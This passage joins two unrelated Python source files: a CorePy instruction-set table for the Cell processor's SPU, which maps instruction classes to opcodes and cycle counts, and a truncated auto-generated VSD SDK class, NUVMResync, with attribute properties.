# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL    
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR    
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER    
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.          

from corepy.spre.spe import Instruction, DispatchInstruction, Register
from spu_insts import *

__doc__="""
ISA for the Cell Broadband Engine's SPU.
"""

class lqx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':452}
  cycles = (1, 6, 0)


class stqx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':324}
  cycles = (1, 6, 0)


class cbx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':468}
  cycles = (1, 4, 0)


class chx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':469}
  cycles = (1, 4, 0)


class cwx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':470}
  cycles = (1, 4, 0)


class cdx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':471}
  cycles = (1, 4, 0)


class ah(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':200}
  cycles = (0, 2, 0)


class a(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':192}
  cycles = (0, 2, 0)


class sfh(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':72}
  cycles = (0, 2, 0)


class sf(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':64}
  cycles = (0, 2, 0)


class addx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':832}
  cycles = (0, 2, 0)


class cg(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':194}
  cycles = (0, 2, 0)


class cgx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':834}
  cycles = (0, 2, 0)


class sfx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':833}
  cycles = (0, 2, 0)


class bg(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':66}
  cycles = (0, 2, 0)


class bgx(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':835}
  cycles = (0, 2, 0)


class mpy(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':964}
  cycles = (0, 7, 0)


class mpyu(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':972}
  cycles = (0, 7, 0)


class mpyh(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':965}
  cycles = (0, 7, 0)


class mpys(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':967}
  cycles = (0, 7, 0)


class mpyhh(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':966}
  cycles = (0, 7, 0)


class mpyhha(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':838}
  cycles = (0, 7, 0)


class mpyhhu(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':974}
  cycles = (0, 7, 0)


class mpyhhau(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':846}
  cycles = (0, 7, 0)


class clz(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':677}
  cycles = (0, 2, 0)


class cntb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':692}
  cycles = (0, 4, 0)


class fsmb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':438}
  cycles = (1, 4, 0)


class fsmh(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':437}
  cycles = (1, 4, 0)


class fsm(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':436}
  cycles = (1, 4, 0)


class gbb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':434}
  cycles = (1, 4, 0)


class gbh(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':433}
  cycles = (1, 4, 0)


class gb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':432}
  cycles = (1, 4, 0)


class avgb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':211}
  cycles = (0, 4, 0)


class absdb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':83}
  cycles = (0, 4, 0)


class sumb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':595}
  cycles = (0, 4, 0)


class xsbh(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':694}
  cycles = (0, 2, 0)


class xshw(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':686}
  cycles = (0, 2, 0)


class xswd(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':678}
  cycles = (0, 2, 0)


class and_(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':193}
  cycles = (0, 2, 0)


class andc(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':705}
  cycles = (0, 2, 0)


class or_(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':65}
  cycles = (0, 2, 0)


class orc(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':713}
  cycles = (0, 2, 0)


class orx(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':496}
  cycles = (1, 4, 0)


class xor(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':577}
  cycles = (0, 2, 0)


class nand(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':201}
  cycles = (0, 2, 0)


class nor(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':73}
  cycles = (0, 2, 0)


class eqv(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':585}
  cycles = (0, 2, 0)


class shlh(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':95}
  cycles = (0, 4, 0)


class shl(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':91}
  cycles = (0, 4, 0)


class shlqbi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':475}
  cycles = (1, 4, 0)


class shlqby(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':479}
  cycles = (1, 4, 0)


class shlqbybi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':463}
  cycles = (1, 4, 0)


class roth(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':92}
  cycles = (0, 4, 0)


class rot(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':88}
  cycles = (0, 4, 0)


class rotqby(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':476}
  cycles = (1, 4, 0)


class rotqbybi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':460}
  cycles = (1, 4, 0)


class rotqbi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':472}
  cycles = (1, 4, 0)


class rothm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':93}
  cycles = (0, 4, 0)


class rotm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':89}
  cycles = (0, 4, 0)


class rotqmby(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':477}
  cycles = (1, 4, 0)


class rotqmbybi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':461}
  cycles = (1, 4, 0)


class rotqmbi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':473}
  cycles = (1, 4, 0)


class rotmah(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':94}
  cycles = (0, 4, 0)


class rotma(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':90}
  cycles = (0, 4, 0)


class heq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':984}
  cycles = (0, 2, 0)


class hgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':600}
  cycles = (0, 2, 0)


class hlgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':728}
  cycles = (0, 2, 0)


class ceqb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':976}
  cycles = (0, 2, 0)


class ceqh(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':968}
  cycles = (0, 2, 0)


class ceq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':960}
  cycles = (0, 2, 0)


class cgtb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':592}
  cycles = (0, 2, 0)


class cgth(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':584}
  cycles = (0, 2, 0)


class cgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':576}
  cycles = (0, 2, 0)


class clgtb(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':720}
  cycles = (0, 2, 0)


class clgth(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':712}
  cycles = (0, 2, 0)


class clgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':704}
  cycles = (0, 2, 0)


class bi(Instruction):
  machine_inst = OPCD_A_D_E
  params = {'OPCD':424}
  cycles = (1, 4, 0)


class iret(Instruction):
  machine_inst = OPCD_A_D_E
  params = {'OPCD':426}
  cycles = (1, 4, 0)


class bisled(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':427}
  cycles = (1, 4, 0)


class bisl(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':425}
  cycles = (1, 4, 0)


class biz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':296}
  cycles = (1, 4, 0)


class binz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':297}
  cycles = (1, 4, 0)


class bihz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':294}
  cycles = (1, 4, 0)


class bihnz(Instruction):
  machine_inst = OPCD_A_T_D_E
  params = {'OPCD':299}
  cycles = (1, 4, 0)


# TODO - can we check that if P is set then RO is zero as required?
class hbr(DispatchInstruction):
  cycles = (1, 15, 0)
  dispatch = (
    (OPCD_RO_A_P,   {'OPCD':428}),
    (OPCD_LBL9_A_P, {'OPCD':428}))


class fa(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':708}
  cycles = (0, 6, 0)


class dfa(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':716}
  cycles = (0, 13, 6)


class fs(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':709}
  cycles = (0, 6, 0)


class dfs(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':717}
  cycles = (0, 13, 6)


class fm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':710}
  cycles = (0, 6, 0)


class dfm(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':718}
  cycles = (0, 13, 6)


class dfma(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':860}
  cycles = (0, 13, 6)


class dfnms(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':862}
  cycles = (0, 13, 6)


class dfms(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':861}
  cycles = (0, 13, 6)


class dfnma(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':863}
  cycles = (0, 13, 6)


class frest(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':440}
  cycles = (1, 4, 0)


class frsqest(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':441}
  cycles = (1, 4, 0)


class fi(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':980}
  cycles = (0, 7, 0)


class frds(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':953}
  cycles = (0, 13, 6)


class fesd(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':952}
  cycles = (0, 13, 6)


class fceq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':962}
  cycles = (0, 2, 0)


class fcmeq(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':970}
  cycles = (0, 2, 0)


class fcgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':706}
  cycles = (0, 2, 0)


class fcmgt(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':714}
  cycles = (0, 2, 0)


class fscrwr(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':954}
  cycles = (0, 7, 0)


class fscrrd(Instruction):
  machine_inst = OPCD_T
  params = {'OPCD':920}
  cycles = (0, 13, 6)


class stop(Instruction):
  machine_inst = OPCD_STOP_SIG
  params = {'OPCD':0}
  cycles = (1, 4, 0)


class stopd(Instruction):
  machine_inst = OPCD_B_A_T
  params = {'OPCD':320}
  cycles = (1, 4, 0)


class lnop(Instruction):
  machine_inst = OPCD
  params = {'OPCD':1}
  cycles = (1, 0, 0)


class nop(Instruction):
  machine_inst = OPCD_T
  params = {'OPCD':513}
  cycles = (0, 0, 0)


class sync(Instruction):
  machine_inst = OPCD_CF
  params = {'OPCD':2}
  cycles = (1, 4, 0)


class dsync(Instruction):
  machine_inst = OPCD
  params = {'OPCD':3}
  cycles = (1, 4, 0)


class mfspr(Instruction):
  machine_inst = OPCD_SA_T
  params = {'OPCD':12}
  cycles = (1, 6, 0)


class mtspr(Instruction):
  machine_inst = OPCD_SA_T
  params = {'OPCD':268}
  cycles = (1, 6, 0)


class rdch(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':13}
  cycles = (1, 6, 0)


class rchcnt(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':15}
  cycles = (1, 6, 0)


class wrch(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':269}
  cycles = (1, 6, 0)


class mpya(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':12}
  cycles = (0, 7, 0)


class selb(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':8}
  cycles = (0, 2, 0)


class shufb(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':11}
  cycles = (1, 4, 0)


class fma(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':14}
  cycles = (0, 6, 0)


class fnms(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':13}
  cycles = (0, 6, 0)


class fms(Instruction):
  machine_inst = OPCD_T_B_A_C
  params = {'OPCD':15}
  cycles = (0, 6, 0)


class cbd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':500}
  cycles = (1, 4, 0)


class chd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':501}
  cycles = (1, 4, 0)


class cwd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':502}
  cycles = (1, 4, 0)


class cdd(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':503}
  cycles = (1, 4, 0)


class shlhi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':127}
  cycles = (0, 4, 0)


class shli(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':123}
  cycles = (0, 4, 0)


class shlqbii(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':507}
  cycles = (1, 4, 0)


class shlqbyi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':511}
  cycles = (1, 4, 0)


class rothi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':124}
  cycles = (0, 4, 0)


class roti(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':120}
  cycles = (0, 4, 0)


class rotqbyi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':508}
  cycles = (1, 4, 0)


class rotqbii(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':504}
  cycles = (1, 4, 0)


class rothmi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':125}
  cycles = (0, 4, 0)


class rotmi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':121}
  cycles = (0, 4, 0)


class rotqmbyi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':509}
  cycles = (1, 4, 0)


class rotqmbii(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':505}
  cycles = (1, 4, 0)


class rotmahi(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':126}
  cycles = (0, 4, 0)


class rotmai(Instruction):
  machine_inst = OPCD_I7_A_T
  params = {'OPCD':122}
  cycles = (0, 4, 0)


class csflt(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':474}
  cycles = (0, 7, 0)


class cflts(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':472}
  cycles = (0, 7, 0)


class cuflt(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':475}
  cycles = (0, 7, 0)


class cfltu(Instruction):
  machine_inst = OPCD_I8_A_T
  params = {'OPCD':473}
  cycles = (0, 7, 0)


class lqd(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':52}
  cycles = (1, 6, 0)


class stqd(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':36}
  cycles = (1, 6, 0)


class ahi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':29}
  cycles = (0, 2, 0)


class ai(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':28}
  cycles = (0, 2, 0)


class sfhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':13}
  cycles = (0, 2, 0)


class sfi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':12}
  cycles = (0, 2, 0)


class mpyi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':116}
  cycles = (0, 7, 0)


class mpyui(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':117}
  cycles = (0, 7, 0)


class andbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':22}
  cycles = (0, 2, 0)


class andhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':21}
  cycles = (0, 2, 0)


class andi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':20}
  cycles = (0, 2, 0)


class orbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':6}
  cycles = (0, 2, 0)


class orhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':5}
  cycles = (0, 2, 0)


class ori(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':4}
  cycles = (0, 2, 0)


class xorbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':70}
  cycles = (0, 2, 0)


class xorhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':69}
  cycles = (0, 2, 0)


class xori(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':68}
  cycles = (0, 2, 0)


class heqi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':127}
  cycles = (0, 2, 0)


class hgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':79}
  cycles = (0, 2, 0)


class hlgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':95}
  cycles = (0, 2, 0)


class ceqbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':126}
  cycles = (0, 2, 0)


class ceqhi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':125}
  cycles = (0, 2, 0)


class ceqi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':124}
  cycles = (0, 2, 0)


class cgtbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':78}
  cycles = (0, 2, 0)


class cgthi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':77}
  cycles = (0, 2, 0)


class cgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':76}
  cycles = (0, 2, 0)


class clgtbi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':94}
  cycles = (0, 2, 0)


class clgthi(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':93}
  cycles = (0, 2, 0)


class clgti(Instruction):
  machine_inst = OPCD_I10_A_T
  params = {'OPCD':92}
  cycles = (0, 2, 0)


class lqa(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':97}
  cycles = (1, 6, 0)


class lqr(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':103}
  cycles = (1, 6, 0)


class stqa(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':65}
  cycles = (1, 6, 0)


class stqr(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':71}
  cycles = (1, 6, 0)


class ilh(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':131}
  cycles = (0, 2, 0)


class ilhu(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':130}
  cycles = (0, 2, 0)


class il(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':129}
  cycles = (0, 2, 0)


class iohl(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':193}
  cycles = (0, 2, 0)


class fsmbi(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':101}
  cycles = (1, 4, 0)


class br(DispatchInstruction):
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16,    {'OPCD':100}),
    (OPCD_LBL16,  {'OPCD':100}))


# TODO - how can I do absolute branches?
class bra(Instruction):
  machine_inst = OPCD_I16
  params = {'OPCD':96}
  cycles = (1, 4, 0)


# TODO - I16 has two zero bits appended, do I handle this correctly?
# What is the correct way, anyway?
class brsl(DispatchInstruction):
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16_T,    {'OPCD':102}),
    (OPCD_LBL16_T,  {'OPCD':102}))


class brasl(Instruction):
  machine_inst = OPCD_I16_T
  params = {'OPCD':98}
  cycles = (1, 4, 0)


class brnz(DispatchInstruction):
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16_T,    {'OPCD':66}),
    (OPCD_LBL16_T,  {'OPCD':66}))


class brz(DispatchInstruction):
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16_T,    {'OPCD':64}),
    (OPCD_LBL16_T,  {'OPCD':64}))


class brhnz(DispatchInstruction):
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16,    {'OPCD':70}),
    (OPCD_LBL16,  {'OPCD':70}))


class brhz(DispatchInstruction):
  cycles = (1, 4, 0)
  dispatch = (
    (OPCD_I16,    {'OPCD':68}),
    (OPCD_LBL16,  {'OPCD':68}))


class hbra(Instruction):
  machine_inst = OPCD_LBL9_I16
  params = {'OPCD':8}
  cycles = (1, 15, 0)


class hbrr(DispatchInstruction):
  cycles = (1, 15, 0)
  dispatch = (
    (OPCD_ROA_I16,     {'OPCD':9}),
    (OPCD_LBL9_LBL16,  {'OPCD':9}))


class ila(Instruction):
  machine_inst = OPCD_I18_T
  params = {'OPCD':33}
  cycles = (0, 2, 0)



# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the copyright holder nor the names of its contributors
#       may be used to endorse or promote products derived from this software without
#       specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.




from .fetchers import NUPermissionsFetcher


from .fetchers import NUMetadatasFetcher


from .fetchers import NUGlobalMetadatasFetcher

from bambou import NURESTObject


class NUVMResync(NURESTObject):
    """ Represents a VMResync in the VSD

        Notes:
            Provide information about the state of a VM resync request.
    """

    __rest_name__ = "resync"
    __resource_name__ = "resync"

    
    ## Constants
    
    CONST_STATUS_IN_PROGRESS = "IN_PROGRESS"
    
    CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
    
    CONST_STATUS_SUCCESS = "SUCCESS"
    
    CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
    
    

    def __init__(self, **kwargs):
        """ Initializes a VMResync instance

            Notes:
                You can specify all parameters while calling this methods.
                A special argument named `data` will enable you to load the
                object from a Python dictionary

            Examples:
                >>> vmresync = NUVMResync(id=u'xxxx-xxx-xxx-xxx', name=u'VMResync')
                >>> vmresync = NUVMResync(data=my_dict)
        """

        super(NUVMResync, self).__init__()

        # Read/Write Attributes
        
        self._last_request_timestamp = None
        self._last_time_resync_initiated = None
        self._last_updated_by = None
        self._last_updated_date = None
        self._embedded_metadata = None
        self._entity_scope = None
        self._creation_date = None
        self._status = None
        self._owner = None
        self._external_id = None
        
        self.expose_attribute(local_name="last_request_timestamp", remote_name="lastRequestTimestamp", attribute_type=int, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_time_resync_initiated", remote_name="lastTimeResyncInitiated", attribute_type=int, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
        self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
        self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="status", remote_name="status", attribute_type=str, is_required=False, is_unique=False, choices=[u'IN_PROGRESS', u'SUCCESS'])
        self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
        

        # Fetchers
        
        
        self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        

        self._compute_args(**kwargs)

    # Properties
    
    @property
    def last_request_timestamp(self):
        """ Get last_request_timestamp value.

            Notes:
                Time of the last timestamp received

                
                This attribute is named `lastRequestTimestamp` in VSD API.
                
        """
        return self._last_request_timestamp

    @last_request_timestamp.setter
    def last_request_timestamp(self, value):
        """ Set last_request_timestamp value.

            Notes:
                Time of the last timestamp received

                
                This attribute is named `lastRequestTimestamp` in VSD API.
                
        """
        self._last_request_timestamp = value

    
    @property
    def last_time_resync_initiated(self):
        """ Get last_time_resync_initiated value.

            Notes:
                Time that the resync was initiated

                
                This attribute is named `lastTimeResyncInitiated` in VSD API.
                
        """
        return self._last_time_resync_initiated

    @last_time_resync_initiated.setter
    def last_time_resync_initiated(self, value):
        """ Set last_time_resync_initiated value.

            Notes:
                Time that the resync was initiated

                
                This attribute is named `lastTimeResyncInitiated` in VSD API.
                
        """
        self._last_time_resync_initiated = value

    
    @property
    def last_updated_by(self):
        """ Get last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        return self._last_updated_by

    @last_updated_by.setter
    def last_updated_by(self, value):
        """ Set last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        self._last_updated_by = value

    
    @property
    def last_updated_date(self):
        """ Get last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        return self._last_updated_date

    @last_updated_date.setter
    def last_updated_date(self, value):
        """ Set last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        self._last_updated_date = value

    
    @property
    def embedded_metadata(self):
        """ Get embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
